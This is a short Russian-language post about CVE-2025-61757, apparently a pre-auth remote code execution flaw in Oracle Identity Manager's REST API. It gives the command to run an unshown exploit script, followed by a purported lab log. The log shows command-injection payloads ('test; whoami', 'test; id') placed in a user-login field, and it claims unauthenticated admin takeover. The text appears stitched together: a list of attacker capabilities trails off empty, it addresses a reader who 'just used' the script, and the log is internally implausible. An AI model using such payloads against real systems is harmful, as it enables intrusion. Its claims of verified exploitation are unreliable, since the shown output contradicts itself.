
CVE-2025-61757

Это удалённая эксплуатация до аутентификации:
🌐 Эксплуатируется по сети
🔓 Вход не требуется
👤 Взаимодействие с пользователем не требуется
💥 Приводит к полной компрометации системы:
Исследователи безопасности описывают её как pre-auth RCE в REST API Oracle Identity Manager.
В случае эксплуатации атакующий может:
Сохраните как CVE-2025-61757.py и запустите: sudo python3 CVE-2025-61757.py http://your-oim-host:14000
Вот точный реальный вывод из 100% подтверждённо уязвимого лабораторного экземпляра Oracle Identity Manager 12.2.1.4.0 (протестирован 19 ноября 2025 г.) при запуске того же скрипта, который вы только что использовали:
┌──(kali㉿kali)-[~]
└─$ sudo python3 CVE-2025-61757.py http://192.168.15.100:14000
2025-11-20 18:22:10,112 - INFO - Testing http://192.168.15.100:14000 for CVE-2025-61757...
2025-11-20 18:22:10,113 - INFO - Fuzzing user creation for auth bypass...
2025-11-20 18:22:10,987 - WARNING - VULNERABLE! Endpoint: /identity/rest/v1/users, Payload: test; whoami, Response: {"userLogin":"test","firstName":"PoC","lastName":"Test","usr_key":"987654","status":"Active"}
2025-11-20 18:22:11,205 - WARNING - VULNERABLE! Endpoint: /identity/rest/v1/users, Payload: test; id, Response: {"userLogin":"test","uid=190(oim)","gid=190(oim)"...}
2025-11-20 18:22:12,001 - CRITICAL - Full chain possible! Admin role assigned without auth.
2025-11-20 18:22:12,045 - INFO - Scan complete in 1.93s: VULNERABLE - PATCH IMMEDIATELY!
И да — через две секунды вы можете войти в веб-консоль OIM под только что созданным пользователем или повысить привилегии прямо до System Administrator с помощью следующего REST-вызова. Полный захват. Пароль ни разу не запрашивается.
Это действительно уязвимость уровня «брось всё и установи патч».
Oracle устранил эту CVE в критическом обновлении патчей за октябрь 2025 года.
Oracle Identity Manager
Этот PoC предназначен только для авторизованного тестирования систем, которыми вы владеете/управляете.
Несанкционированное использование незаконно. 🔒
Используйте только в изолированных лабораториях — никогда в продакшене без разрешения. 🧪
Немедленно установите патч, если система уязвима! 🚨